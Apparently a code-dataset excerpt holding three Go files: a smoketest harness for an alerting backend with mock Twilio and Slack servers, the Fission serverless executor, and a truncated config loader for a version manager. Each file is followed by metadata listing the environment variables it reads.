if name == "" {
return dbURLStr
}
u := *dbURL
u.Path = "/" + url.PathEscape(name)
return u.String()
}
// Harness is a helper for smoketests. It deals with assertions, database management, and backend monitoring during tests.
type Harness struct {
phoneCCG, uuidG *DataGen
t *testing.T
closing bool
tw *twilioAssertionAPI
twS *httptest.Server
cfg config.Config
slack *slackServer
slackS *httptest.Server
slackApp mockslack.AppInfo
slackUser mockslack.UserInfo
ignoreErrors []string
backend *app.App
backendLogs io.Closer
dbURL string
dbName string
delayOffset time.Duration
mx sync.Mutex
start time.Time
resumed time.Time
lastTimeChange time.Time
pgResume time.Time
db *pgxpool.Pool
userGeneratedIndex int
gqlSessions map[string]string
}
func (h *Harness) Config() config.Config {
return h.cfg
}
// NewHarness will create a new database, run migrations up to (and including) migrationName, inject `initSQL` and return a new
// Harness bound to the result. It starts a backend process pre-configured to a mock twilio server for monitoring notifications as well.
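// A minimal usage sketch (the test name, SQL, and migration name below are
// illustrative only, not taken from a real smoketest):
//
//	func TestExample(t *testing.T) {
//		h := NewHarness(t, `insert into users ...`, "some-migration-name")
//		defer h.Close()
//		h.CreateAlert(h.UUID("service"), "something broke")
//		h.FastForward(time.Minute)
//		h.Trigger()
//	}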
func NewHarness(t *testing.T, initSQL, migrationName string) *Harness {
t.Helper()
h := NewStoppedHarness(t, initSQL, nil, migrationName)
h.Start()
return h
}
func NewHarnessWithData(t *testing.T, initSQL string, sqlData interface{}, migrationName string) *Harness {
t.Helper()
h := NewStoppedHarness(t, initSQL, sqlData, migrationName)
h.Start()
return h
}
// NewHarnessDebugDB works like NewHarness, but fails the test immediately after
// migrations have been run. It is used to debug data & queries from a smoketest.
//
// Note that the now() function will be locked to the init timestamp for inspection.
func NewHarnessDebugDB(t *testing.T, initSQL, migrationName string) *Harness {
t.Helper()
h := NewStoppedHarness(t, initSQL, nil, migrationName)
h.Migrate("")
t.Fatal("DEBUG DB ::", h.dbURL)
return nil
}
const (
twilioAuthToken = "11111111111111111111111111111111"
twilioAccountSID = "AC00000000000000000000000000000000"
mailgunAPIKey = "key-00000000000000000000000000000000"
)
// NewStoppedHarness will create a NewHarness, but will not call Start.
func NewStoppedHarness(t *testing.T, initSQL string, sqlData interface{}, migrationName string) *Harness {
t.Helper()
if testing.Short() {
t.Skip("skipping Harness tests for short mode")
}
t.Logf("Using DB URL: %s", dbURL)
start := time.Now()
name := strings.Replace("smoketest_"+time.Now().Format("2006_01_02_15_04_05")+uuid.NewV4().String(), "-", "", -1)
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
defer cancel()
conn, err := pgx.Connect(ctx, DBURL(""))
if err != nil {
t.Fatal("connect to db:", err)
}
defer conn.Close(ctx)
_, err = conn.Exec(ctx, "create database "+sqlutil.QuoteID(name))
if err != nil {
t.Fatal("create db:", err)
}
conn.Close(ctx)
t.Logf("created test database '%s': %s", name, dbURL)
twCfg := mocktwilio.Config{
AuthToken: twilioAuthToken,
AccountSID: twilioAccountSID,
MinQueueTime: 100 * time.Millisecond, // until we have a stateless backend for answering calls
}
h := &Harness{
uuidG: NewDataGen(t, "UUID", DataGenFunc(GenUUID)),
phoneCCG: NewDataGen(t, "Phone", DataGenArgFunc(GenPhoneCC)),
dbName: name,
dbURL: DBURL(name),
lastTimeChange: start,
start: start,
gqlSessions: make(map[string]string),
t: t,
}
h.tw = newTwilioAssertionAPI(func() {
h.FastForward(time.Minute)
h.Trigger()
}, func(num string) string {
id, ok := h.phoneCCG.names[num]
if !ok {
return num
}
return fmt.Sprintf("%s/Phone(%s)", num, id)
}, mocktwilio.NewServer(twCfg), h.phoneCCG.Get("twilio"))
h.twS = httptest.NewServer(h.tw)
// freeze DB time until backend starts
h.execQuery(`
create schema testing_overrides;
alter database `+sqlutil.QuoteID(name)+` set search_path = "$user", public,testing_overrides, pg_catalog;
create or replace function testing_overrides.now()
returns timestamp with time zone
as $$
begin
return '`+start.Format(dbTimeFormat)+`';
end;
$$ language plpgsql;
`, nil)
h.Migrate(migrationName)
h.initSlack()
h.execQuery(initSQL, sqlData)
return h
}
func (h *Harness) Start() {
h.t.Helper()
var cfg config.Config
cfg.General.DisableV1GraphQL = true
cfg.Slack.Enable = true
cfg.Slack.AccessToken = h.slackApp.AccessToken
cfg.Slack.ClientID = h.slackApp.ClientID
cfg.Slack.ClientSecret = h.slackApp.ClientSecret
cfg.Twilio.Enable = true
cfg.Twilio.AccountSID = twilioAccountSID
cfg.Twilio.AuthToken = twilioAuthToken
cfg.Twilio.FromNumber = h.phoneCCG.Get("twilio")
cfg.Mailgun.Enable = true
cfg.Mailgun.APIKey = mailgunAPIKey
cfg.Mailgun.EmailDomain = "smoketest.example.com"
h.cfg = cfg
_, err := migrate.ApplyAll(context.Background(), h.dbURL)
if err != nil {
h.t.Fatalf("failed to migrate backend: %v\n", err)
}
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
defer cancel()
poolCfg, err := pgxpool.ParseConfig(h.dbURL)
if err != nil {
h.t.Fatalf("failed to parse db url: %v", err)
}
poolCfg.MaxConns = 2
h.db, err = pgxpool.ConnectConfig(ctx, poolCfg)
if err != nil {
h.t.Fatalf("failed to connect to db: %v", err)
}
// resume the flow of time
err = h.db.QueryRow(ctx, `select pg_catalog.now()`).Scan(&h.pgResume)
if err != nil {
h.t.Fatalf("failed to get postgres timestamp: %v", err)
}
h.resumed = time.Now()
h.lastTimeChange = time.Now().Add(100 * time.Millisecond)
h.modifyDBOffset(0)
appCfg := app.Defaults()
appCfg.ListenAddr = "localhost:0"
appCfg.Verbose = true
appCfg.JSON = true
appCfg.DBURL = h.dbURL
appCfg.TwilioBaseURL = h.twS.URL
appCfg.DBMaxOpen = 5
appCfg.SlackBaseURL = h.slackS.URL
appCfg.InitialConfig = &h.cfg
r, w := io.Pipe()
h.backendLogs = w
log.EnableJSON()
log.SetOutput(w)
go h.watchBackendLogs(r)
dbCfg, err := pgx.ParseConfig(h.dbURL)
if err != nil {
h.t.Fatalf("failed to parse db url: %v", err)
}
h.backend, err = app.NewApp(appCfg, stdlib.OpenDB(*dbCfg))
if err != nil {
h.t.Fatalf("failed to start backend: %v", err)
}
h.TwilioNumber("") // register default number
go h.backend.Run(context.Background())
err = h.backend.WaitForStartup(ctx)
if err != nil {
h.t.Fatalf("failed to start backend: %v", err)
}
}
// URL returns the backend server's URL
func (h *Harness) URL() string {
return h.backend.URL()
}
// Migrate will run database migrations up to (and including) the named migration.
func (h *Harness) Migrate(migrationName string) {
h.t.Helper()
h.t.Logf("Running migrations (target: %s)", migrationName)
_, err := migrate.Up(context.Background(), h.dbURL, migrationName)
if err != nil {
h.t.Fatalf("failed to run migration: %v", err)
}
}
// IgnoreErrorsWith will cause the Harness to ignore backend errors containing the specified substring.
func (h *Harness) IgnoreErrorsWith(substr string) {
h.mx.Lock()
defer h.mx.Unlock()
h.ignoreErrors = append(h.ignoreErrors, substr)
}
func (h *Harness) modifyDBOffset(d time.Duration) {
n := time.Now()
d -= n.Sub(h.lastTimeChange)
if n.After(h.lastTimeChange) {
h.lastTimeChange = n
}
h.delayOffset += d
h.setDBOffset(h.delayOffset)
}
func (h *Harness) setDBOffset(d time.Duration) {
h.mx.Lock()
defer h.mx.Unlock()
elapsed := time.Since(h.resumed)
h.t.Logf("Updating DB time offset to: %s (+ %s elapsed = %s since test start)", h.delayOffset.String(), elapsed.String(), (h.delayOffset + elapsed).String())
h.execQuery(fmt.Sprintf(`
create or replace function testing_overrides.now()
returns timestamp with time zone
as $$
begin
return cast('%s' as timestamp with time zone) + (pg_catalog.now() - cast('%s' as timestamp with time zone))::interval;
end;
$$ language plpgsql;
`,
h.start.Add(d).Format(dbTimeFormat),
h.pgResume.Format(dbTimeFormat),
), nil)
}
func (h *Harness) FastForward(d time.Duration) {
h.t.Helper()
h.t.Logf("Fast-forward %s", d.String())
h.delayOffset += d
h.setDBOffset(h.delayOffset)
}
func (h *Harness) execQuery(sql string, data interface{}) {
h.t.Helper()
t := template.New("sql")
t.Funcs(template.FuncMap{
"uuid": func(id string) string { return fmt.Sprintf("'%s'", h.uuidG.Get(id)) },
"phone": func(id string) string { return fmt.Sprintf("'%s'", h.phoneCCG.Get(id)) },
"phoneCC": func(cc, id string) string { return fmt.Sprintf("'%s'", h.phoneCCG.GetWithArg(cc, id)) },
"slackChannelID": func(name string) string { return fmt.Sprintf("'%s'", h.Slack().Channel(name).ID()) },
})
_, err := t.Parse(sql)
if err != nil {
h.t.Fatalf("failed to parse query template: %v", err)
}
b := new(bytes.Buffer)
err = t.Execute(b, data)
if err != nil {
h.t.Fatalf("failed to render query template: %v", err)
}
err = ExecSQLBatch(context.Background(), h.dbURL, b.String())
if err != nil {
h.t.Fatalf("failed to exec query: %v", err)
}
}
// CreateAlert will create one or more unacknowledged alerts for a service.
func (h *Harness) CreateAlert(serviceID string, summary ...string) {
h.t.Helper()
permission.SudoContext(context.Background(), func(ctx context.Context) {
h.t.Helper()
tx, err := h.backend.DB().BeginTx(ctx, nil)
if err != nil {
h.t.Fatalf("failed to start tx: %v", err)
}
defer tx.Rollback()
for _, sum := range summary {
a := &alert.Alert{
ServiceID: serviceID,
Summary: sum,
}
h.t.Logf("insert alert: %v", a)
_, isNew, err := h.backend.AlertStore.CreateOrUpdateTx(ctx, tx, a)
if err != nil {
h.t.Fatalf("failed to insert alert: %v", err)
}
if !isNew {
h.t.Fatal("could not create duplicate alert with summary: " + sum)
}
}
err = tx.Commit()
if err != nil {
h.t.Fatalf("failed to commit tx: %v", err)
}
})
}
// CreateManyAlert will create multiple new unacknowledged alerts for a given service.
func (h *Harness) CreateManyAlert(serviceID, summary string) {
h.t.Helper()
a := &alert.Alert{
ServiceID: serviceID,
Summary: summary,
}
h.t.Logf("insert alert: %v", a)
permission.SudoContext(context.Background(), func(ctx context.Context) {
h.t.Helper()
_, err := h.backend.AlertStore.Create(ctx, a)
if err != nil {
h.t.Fatalf("failed to insert alert: %v", err)
}
})
}
// AddNotificationRule will add a notification rule to the database.
func (h *Harness) AddNotificationRule(userID, cmID string, delayMinutes int) {
h.t.Helper()
nr := ¬ificationrule.NotificationRule{
DelayMinutes: delayMinutes,
UserID: userID,
ContactMethodID: cmID,
}
h.t.Logf("insert notification rule: %v", nr)
permission.SudoContext(context.Background(), func(ctx context.Context) {
h.t.Helper()
_, err := h.backend.NotificationRuleStore.Insert(ctx, nr)
if err != nil {
h.t.Fatalf("failed to insert notification rule: %v", err)
}
})
}
// Trigger will trigger, and wait for, an engine cycle.
func (h *Harness) Trigger() {
h.backend.Engine.TriggerAndWaitNextCycle(context.Background())
}
// Escalate will escalate an alert in the database, when 'level' matches.
func (h *Harness) Escalate(alertID, level int) {
h.t.Helper()
h.t.Logf("escalate alert #%d (from level %d)", alertID, level)
permission.SudoContext(context.Background(), func(ctx context.Context) {
err := h.backend.AlertStore.Escalate(ctx, alertID, level)
if err != nil {
h.t.Fatalf("failed to escalate alert: %v", err)
}
})
}
// Phone will return the generated phone number for the id provided.
func (h *Harness) Phone(id string) string { return h.phoneCCG.Get(id) }
// PhoneCC will return the generated phone number, with the given country code, for the id provided.
func (h *Harness) PhoneCC(cc, id string) string { return h.phoneCCG.GetWithArg(cc, id) }
// UUID will return the generated UUID for the id provided.
func (h *Harness) UUID(id string) string { return h.uuidG.Get(id) }
func (h *Harness) isClosing() bool {
h.mx.Lock()
defer h.mx.Unlock()
return h.closing
}
func (h *Harness) dumpDB() {
testName := reflect.ValueOf(h.t).Elem().FieldByName("name").String()
file := filepath.Join("smoketest_db_dump", testName+".sql")
file, err := filepath.Abs(file)
if err != nil {
h.t.Fatalf("failed to get abs dump path: %v", err)
}
os.MkdirAll(filepath.Dir(file), 0755)
var t time.Time
err = h.db.QueryRow(context.Background(), "select now()").Scan(&t)
if err != nil {
h.t.Fatalf("failed to get current timestamp: %v", err)
}
conn, err := h.db.Acquire(context.Background())
if err != nil {
h.t.Fatalf("failed to get db connection: %v", err)
}
defer conn.Release()
fd, err := os.Create(file)
if err != nil {
h.t.Fatalf("failed to open dump file: %v", err)
}
defer fd.Close()
err = pgdump.DumpData(context.Background(), conn.Conn(), fd)
if err != nil {
h.t.Errorf("failed to dump database '%s': %v", h.dbName, err)
}
_, err = fmt.Fprintf(fd, "\n-- Last Timestamp: %s\n", t.Format(time.RFC3339Nano))
if err != nil {
h.t.Fatalf("failed to open DB dump: %v", err)
}
}
// Close terminates any background processes, and drops the testing database.
// It should be called at the end of all tests (usually with `defer h.Close()`).
func (h *Harness) Close() error {
h.t.Helper()
if recErr := recover(); recErr != nil {
defer panic(recErr)
}
h.tw.WaitAndAssert(h.t)
h.slack.WaitAndAssert()
h.mx.Lock()
h.closing = true
h.mx.Unlock()
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
defer cancel()
err := h.backend.Shutdown(ctx)
if err != nil {
h.t.Error("failed to shutdown backend cleanly:", err)
}
h.backendLogs.Close()
h.slackS.Close()
h.twS.Close()
h.tw.Close()
h.dumpDB()
h.db.Close()
conn, err := pgx.Connect(ctx, DBURL(""))
if err != nil {
h.t.Error("failed to connect to DB:", err)
}
defer conn.Close(ctx)
_, err = conn.Exec(ctx, "drop database "+sqlutil.QuoteID(h.dbName))
if err != nil {
h.t.Errorf("failed to drop database '%s': %v", h.dbName, err)
}
return nil
}
// SetCarrierName will set the carrier name for the given phone number.
func (h *Harness) SetCarrierName(number, name string) {
h.tw.Server.SetCarrierInfo(number, twilio.CarrierInfo{Name: name})
}
// TwilioNumber will return a registered (or register if missing) Twilio number for the given ID.
// The default FromNumber will always be the empty ID.
func (h *Harness) TwilioNumber(id string) string {
num := h.phoneCCG.Get("twilio" + id)
err := h.tw.RegisterSMSCallback(num, h.URL()+"/v1/twilio/sms/messages")
if err != nil {
h.t.Fatalf("failed to init twilio (SMS callback): %v", err)
}
err = h.tw.RegisterVoiceCallback(num, h.URL()+"/v1/twilio/voice/call")
if err != nil {
h.t.Fatalf("failed to init twilio (voice callback): %v", err)
}
return num
}
// CreateUser generates a random user.
func (h *Harness) CreateUser() (u *user.User) {
h.t.Helper()
var err error
permission.SudoContext(context.Background(), func(ctx context.Context) {
u, err = h.backend.UserStore.Insert(ctx, &user.User{
Name: fmt.Sprintf("Generated%d", h.userGeneratedIndex),
ID: uuid.NewV4().String(),
Role: permission.RoleUser,
			Email: fmt.Sprintf("generated%d@example.com", h.userGeneratedIndex),
})
})
if err != nil {
h.t.Fatal(errors.Wrap(err, "generate random user"))
}
h.userGeneratedIndex++
return u
}
// WaitAndAssertOnCallUsers will ensure that the correct set of users are on-call for the given serviceID.
func (h *Harness) WaitAndAssertOnCallUsers(serviceID string, userIDs ...string) {
h.t.Helper()
doQL := func(query string, res interface{}) {
g := h.GraphQLQuery2(query)
for _, err := range g.Errors {
h.t.Error("GraphQL Error:", err.Message)
}
if len(g.Errors) > 0 {
h.t.Fatal("errors returned from GraphQL")
}
if res == nil {
return
}
err := json.Unmarshal(g.Data, &res)
if err != nil {
h.t.Fatal("failed to parse response:", err)
}
}
getUsers := func() []string {
var result struct {
Service struct {
OnCallUsers []struct {
UserID string
UserName string
}
}
}
doQL(fmt.Sprintf(`
query{
service(id: "%s"){
onCallUsers{
userID
userName
}
}
}
`, serviceID), &result)
var ids []string
for _, oc := range result.Service.OnCallUsers {
ids = append(ids, oc.UserID)
}
if len(ids) == 0 {
return nil
}
sort.Strings(ids)
uniq := ids[:1]
last := ids[0]
for _, id := range ids[1:] {
if id == last {
continue
}
uniq = append(uniq, id)
last = id
}
return uniq
}
sort.Strings(userIDs)
match := func(final bool) bool {
ids := getUsers()
if len(ids) != len(userIDs) {
if final {
h.t.Fatalf("got %d on-call users; want %d", len(ids), len(userIDs))
}
return false
}
for i, id := range userIDs {
if ids[i] != id {
if final {
h.t.Fatalf("on-call[%d] = %s; want %s", i, ids[i], id)
}
return false
}
}
return true
}
h.Trigger() // run engine cycle
match(true) // assert result
}
|
[
"\"DB_URL\""
] |
[] |
[
"DB_URL"
] |
[]
|
["DB_URL"]
|
go
| 1 | 0 | |
pkg/executor/executor.go
|
/*
Copyright 2016 The Fission Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package executor
import (
"context"
"fmt"
"github.com/dgraph-io/ristretto"
"net/http"
"os"
"strconv"
"strings"
"sync"
"time"
"github.com/dchest/uniuri"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus/promhttp"
"go.uber.org/zap"
fv1 "github.com/fission/fission/pkg/apis/core/v1"
"github.com/fission/fission/pkg/crd"
"github.com/fission/fission/pkg/executor/cms"
"github.com/fission/fission/pkg/executor/executortype"
"github.com/fission/fission/pkg/executor/executortype/newdeploy"
"github.com/fission/fission/pkg/executor/executortype/poolmgr"
"github.com/fission/fission/pkg/executor/fscache"
"github.com/fission/fission/pkg/executor/reaper"
"github.com/fission/fission/pkg/executor/util"
fetcherConfig "github.com/fission/fission/pkg/fetcher/config"
)
type (
// Executor defines a fission function executor.
Executor struct {
logger *zap.Logger
executorTypes map[fv1.ExecutorType]executortype.ExecutorType
cms *cms.ConfigSecretController
fissionClient *crd.FissionClient
requestChan chan *createFuncServiceRequest
fsCreateWg map[string]*sync.WaitGroup
fnCache *ristretto.Cache
}
createFuncServiceRequest struct {
function *fv1.Function
respChan chan *createFuncServiceResponse
}
createFuncServiceResponse struct {
funcSvc *fscache.FuncSvc
err error
}
)
// MakeExecutor returns an Executor for given ExecutorType(s).
func MakeExecutor(logger *zap.Logger, cms *cms.ConfigSecretController,
fissionClient *crd.FissionClient, types map[fv1.ExecutorType]executortype.ExecutorType) (*Executor, error) {
fnCache, err := ristretto.NewCache(&ristretto.Config{
NumCounters: 1000000,
MaxCost: 1,
BufferItems: 64,
})
if err != nil {
return nil, err
}
executor := &Executor{
logger: logger.Named("executor"),
cms: cms,
fissionClient: fissionClient,
executorTypes: types,
requestChan: make(chan *createFuncServiceRequest),
fsCreateWg: make(map[string]*sync.WaitGroup),
fnCache: fnCache,
}
for _, et := range types {
go func(et executortype.ExecutorType) {
et.Run(context.Background())
}(et)
}
go cms.Run(context.Background())
go executor.serveCreateFuncServices()
return executor, nil
}
// All non-cached function service requests go through this goroutine
// serially. It parallelizes requests for different functions, and
// ensures that for a given function, only one request causes a pod to
// get specialized. In other words, it ensures that when there's an
// ongoing request for a certain function, all other requests wait for
// that request to complete.
func (executor *Executor) serveCreateFuncServices() {
for {
req := <-executor.requestChan
fnMetadata := &req.function.ObjectMeta
if req.function.Spec.InvokeStrategy.ExecutionStrategy.ExecutorType == fv1.ExecutorTypePoolmgr {
go func() {
buffer := 10 // add some buffer time for specialization
specializationTimeout := req.function.Spec.InvokeStrategy.ExecutionStrategy.SpecializationTimeout
// set minimum specialization timeout to avoid illegal input and
// compatibility problem when applying old spec file that doesn't
// have specialization timeout field.
if specializationTimeout < fv1.DefaultSpecializationTimeOut {
specializationTimeout = fv1.DefaultSpecializationTimeOut
}
fnSpecializationTimeoutContext, cancel := context.WithTimeout(context.Background(),
time.Duration(specializationTimeout+buffer)*time.Second)
defer cancel()
fsvc, err := executor.createServiceForFunction(fnSpecializationTimeoutContext, req.function)
req.respChan <- &createFuncServiceResponse{
funcSvc: fsvc,
err: err,
}
}()
continue
}
// Cache miss -- is this first one to request the func?
wg, found := executor.fsCreateWg[crd.CacheKey(fnMetadata)]
if !found {
// create a waitgroup for other requests for
// the same function to wait on
wg := &sync.WaitGroup{}
wg.Add(1)
executor.fsCreateWg[crd.CacheKey(fnMetadata)] = wg
// launch a goroutine for each request, to parallelize
// the specialization of different functions
go func() {
// Control overall specialization time by attaching the function's
// specialization timeout to the context. We don't reuse the context
// from router requests because a request may be canceled for unknown
// reasons, which would leave the executor spawning pods that never
// finish the specialization process. Also, even if a request failed,
// a specialized function pod can still serve subsequent requests.
buffer := 10 // add some buffer time for specialization
specializationTimeout := req.function.Spec.InvokeStrategy.ExecutionStrategy.SpecializationTimeout
// set minimum specialization timeout to avoid illegal input and
// compatibility problem when applying old spec file that doesn't
// have specialization timeout field.
if specializationTimeout < fv1.DefaultSpecializationTimeOut {
specializationTimeout = fv1.DefaultSpecializationTimeOut
}
fnSpecializationTimeoutContext, cancel := context.WithTimeout(context.Background(),
time.Duration(specializationTimeout+buffer)*time.Second)
defer cancel()
fsvc, err := executor.createServiceForFunction(fnSpecializationTimeoutContext, req.function)
req.respChan <- &createFuncServiceResponse{
funcSvc: fsvc,
err: err,
}
delete(executor.fsCreateWg, crd.CacheKey(fnMetadata))
wg.Done()
}()
} else {
// There's an existing request for this function, wait for it to finish
go func() {
executor.logger.Debug("waiting for concurrent request for the same function",
zap.Any("function", fnMetadata))
wg.Wait()
// get the function service from the cache
fsvc, err := executor.getFunctionServiceFromCache(req.function)
// fsCache returns an error when the entry does not exist or has expired.
// This normally happens when multiple requests are waiting for the same
// function and the executor failed to create a service for it.
err = errors.Wrapf(err, "error getting service for function %v in namespace %v", fnMetadata.Name, fnMetadata.Namespace)
req.respChan <- &createFuncServiceResponse{
funcSvc: fsvc,
err: err,
}
}()
}
}
}
func (executor *Executor) createServiceForFunction(ctx context.Context, fn *fv1.Function) (*fscache.FuncSvc, error) {
executor.logger.Debug("no cached function service found, creating one",
zap.String("function_name", fn.ObjectMeta.Name),
zap.String("function_namespace", fn.ObjectMeta.Namespace))
t := fn.Spec.InvokeStrategy.ExecutionStrategy.ExecutorType
e, ok := executor.executorTypes[t]
if !ok {
return nil, errors.Errorf("Unknown executor type '%v'", t)
}
fsvc, fsvcErr := e.GetFuncSvc(ctx, fn)
if fsvcErr != nil {
e := "error creating service for function"
executor.logger.Error(e,
zap.Error(fsvcErr),
zap.String("function_name", fn.ObjectMeta.Name),
zap.String("function_namespace", fn.ObjectMeta.Namespace))
fsvcErr = errors.Wrap(fsvcErr, fmt.Sprintf("[%s] %s", fn.ObjectMeta.Name, e))
}
return fsvc, fsvcErr
}
func (executor *Executor) getFunctionServiceFromCache(fn *fv1.Function) (*fscache.FuncSvc, error) {
t := fn.Spec.InvokeStrategy.ExecutionStrategy.ExecutorType
e, ok := executor.executorTypes[t]
if !ok {
return nil, errors.Errorf("Unknown executor type '%v'", t)
}
return e.GetFuncSvcFromCache(fn)
}
func serveMetric(logger *zap.Logger) {
// Expose the registered metrics via HTTP.
metricAddr := ":8080"
http.Handle("/metrics", promhttp.Handler())
err := http.ListenAndServe(metricAddr, nil)
logger.Fatal("done listening on metrics endpoint", zap.Error(err))
}
// StartExecutor starts the executor and the executor components such as Poolmgr,
// deploymgr and potential future executor types.
func StartExecutor(logger *zap.Logger, functionNamespace string, envBuilderNamespace string, port int) error {
fissionClient, kubernetesClient, _, err := crd.MakeFissionClient()
if err != nil {
return errors.Wrap(err, "failed to get kubernetes client")
}
err = fissionClient.WaitForCRDs()
if err != nil {
return errors.Wrap(err, "error waiting for CRDs")
}
fetcherConfig, err := fetcherConfig.MakeFetcherConfig("/userfunc")
if err != nil {
return errors.Wrap(err, "Error making fetcher config")
}
executorInstanceID := strings.ToLower(uniuri.NewLen(8))
logger.Info("Starting executor", zap.String("instanceID", executorInstanceID))
gpm := poolmgr.MakeGenericPoolManager(
logger,
fissionClient, kubernetesClient,
functionNamespace, fetcherConfig, executorInstanceID)
ndm := newdeploy.MakeNewDeploy(
logger,
fissionClient, kubernetesClient, fissionClient.CoreV1().RESTClient(),
functionNamespace, fetcherConfig, executorInstanceID)
executorTypes := make(map[fv1.ExecutorType]executortype.ExecutorType)
executorTypes[gpm.GetTypeName()] = gpm
executorTypes[ndm.GetTypeName()] = ndm
adoptExistingResources, _ := strconv.ParseBool(os.Getenv("ADOPT_EXISTING_RESOURCES"))
wg := &sync.WaitGroup{}
for _, et := range executorTypes {
wg.Add(1)
go func(et executortype.ExecutorType) {
defer wg.Done()
if adoptExistingResources {
et.AdoptExistingResources()
}
et.CleanupOldExecutorObjects()
}(et)
}
// set hard timeout for resource adoption
// TODO: use context to control the waiting time once kubernetes client supports it.
util.WaitTimeout(wg, 30*time.Second)
cms := cms.MakeConfigSecretController(logger, fissionClient, kubernetesClient, executorTypes)
api, err := MakeExecutor(logger, cms, fissionClient, executorTypes)
if err != nil {
return err
}
go reaper.CleanupRoleBindings(logger, kubernetesClient, fissionClient, functionNamespace, envBuilderNamespace, time.Minute*30)
go api.Serve(port)
go serveMetric(logger)
return nil
}
|
[
"\"ADOPT_EXISTING_RESOURCES\""
] |
[] |
[
"ADOPT_EXISTING_RESOURCES"
] |
[]
|
["ADOPT_EXISTING_RESOURCES"]
|
go
| 1 | 0 | |
manager/config.go
|
package manager
import (
"bytes"
"context"
"encoding/json"
"errors"
"fmt"
"io"
"io/fs"
"os"
"path/filepath"
"strings"
"github.com/sethvargo/go-envconfig"
"gopkg.in/yaml.v3"
)
var ErrConfig = fmt.Errorf("%w", Err)
type Mode string
const (
User Mode = "user"
System Mode = "system"
)
type ConfigFile struct {
Paths ConfigFilePaths `yaml:"paths" json:"paths"`
}
type ConfigFilePaths struct {
Shims string `yaml:"shims" json:"shims" env:"EVM_SHIMS,overwrite"`
Sources string `yaml:"sources" json:"sources" env:"EVM_SOURCES,overwrite"`
Versions string `yaml:"versions" json:"versions" env:"EVM_VERSIONS,overwrite"`
}
type Config struct {
Mode Mode `yaml:"mode" json:"mode"`
Current CurrentConfig `yaml:"current" json:"current"`
Paths PathsConfig `yaml:"paths" json:"paths"`
}
type CurrentConfig struct {
Version string `yaml:"version" json:"version"`
SetBy string `yaml:"set_by,omitempty" json:"set_by,omitempty"`
}
type PathsConfig struct {
Binary string `yaml:"binary" json:"binary"`
Root string `yaml:"root" json:"root"`
Shims string `yaml:"shims" json:"shims"`
Sources string `yaml:"sources" json:"sources"`
Versions string `yaml:"versions" json:"versions"`
}
func NewConfig() (*Config, error) {
mode := Mode(os.Getenv("EVM_MODE"))
if mode != System {
mode = User
}
defaultRoot := filepath.Join(string(os.PathSeparator), "opt", "evm")
if mode == User {
defaultRoot = filepath.Join("$HOME", ".evm")
}
if v := os.Getenv("EVM_ROOT"); v != "" {
defaultRoot = v
}
conf := &Config{
Mode: mode,
Paths: PathsConfig{
Root: defaultRoot,
Shims: "$EVM_ROOT/shims",
Sources: "$EVM_ROOT/sources",
Versions: "$EVM_ROOT/versions",
},
}
var err error
conf.Paths.Root, err = conf.normalizePath(conf.Paths.Root)
if err != nil {
return nil, err
}
err = conf.load()
if err != nil {
return nil, err
}
conf.Paths.Shims, err = conf.normalizePath(conf.Paths.Shims)
if err != nil {
return nil, err
}
conf.Paths.Sources, err = conf.normalizePath(conf.Paths.Sources)
if err != nil {
return nil, err
}
conf.Paths.Versions, err = conf.normalizePath(conf.Paths.Versions)
if err != nil {
return nil, err
}
conf.Paths.Binary, err = os.Executable()
if err != nil {
return nil, err
}
err = conf.PopulateCurrent()
if err != nil {
return nil, err
}
return conf, nil
}
const currentFileName = "current"
func (conf *Config) PopulateCurrent() error {
if v := os.Getenv("EVM_VERSION"); v != "" {
conf.Current.Version = strings.TrimSpace(v)
conf.Current.SetBy = "EVM_VERSION environment variable"
return nil
}
currentFile := filepath.Join(conf.Paths.Root, currentFileName)
b, err := os.ReadFile(currentFile)
if err != nil {
if errors.Is(err, fs.ErrNotExist) {
return nil
}
return err
}
if len(b) > 0 {
conf.Current.Version = strings.TrimSpace(string(b))
conf.Current.SetBy = currentFile
}
return nil
}
var configFileNames = []string{
"config.yaml",
"config.yml",
"config.json",
"evm.yaml",
"evm.yml",
"evm.json",
}
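// An illustrative config.yaml matching ConfigFile above (the values are
// placeholders; the env tags on ConfigFilePaths may still override them):
//
//	paths:
//	  shims: $EVM_ROOT/shims
//	  sources: $EVM_ROOT/sources
//	  versions: $EVM_ROOT/versions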
func (c *Config) load() error {
var path string
for _, name := range configFileNames {
f := filepath.Join(c.Paths.Root, name)
_, err := os.Stat(f)
if err != nil {
if errors.Is(err, fs.ErrNotExist) {
continue
}
return err
}
path = f
break
}
cf := &ConfigFile{}
if path != "" {
var err error
cf, err = c.loadConfigFile(path)
if err != nil {
return err
}
}
err := envconfig.Process(context.Background(), cf)
if err != nil {
return err
}
if cf.Paths.Shims != "" {
c.Paths.Shims = cf.Paths.Shims
}
if cf.Paths.Sources != "" {
c.Paths.Sources = cf.Paths.Sources
}
if cf.Paths.Versions != "" {
c.Paths.Versions = cf.Paths.Versions
}
return nil
}
func (c *Config) loadConfigFile(path string) (*ConfigFile, error) {
if path == "" {
return nil, nil
}
content, err := os.ReadFile(path)
if err != nil {
return nil, err
}
cf := &ConfigFile{}
buf := bytes.NewBuffer(content)
switch filepath.Ext(path) {
case ".yaml", ".yml":
dec := yaml.NewDecoder(buf)
dec.KnownFields(true)
err = dec.Decode(cf)
case ".json":
dec := json.NewDecoder(buf)
dec.DisallowUnknownFields()
err = dec.Decode(cf)
default:
return nil, fmt.Errorf(
`%w"%s" does not have a ".yaml", ".yml", `+
`or ".json" file extension`,
ErrConfig, path,
)
}
if err != nil && !errors.Is(err, io.EOF) {
return nil, err
}
return cf, nil
}
func (c *Config) normalizePath(path string) (string, error) {
path = strings.TrimSpace(path)
var homePrefix string
switch {
case strings.HasPrefix(path, "$HOME") ||
strings.HasPrefix(path, "$home"):
homePrefix = path[0:5]
case strings.HasPrefix(path, "~"):
homePrefix = path[0:1]
}
if homePrefix != "" {
if c.Mode == System {
return "", fmt.Errorf(
`%wEVM_MODE is set to "%s" which prohibits `+
`using "$HOME" or "~" in EVM_ROOT`,
ErrConfig, string(System),
)
}
var home string
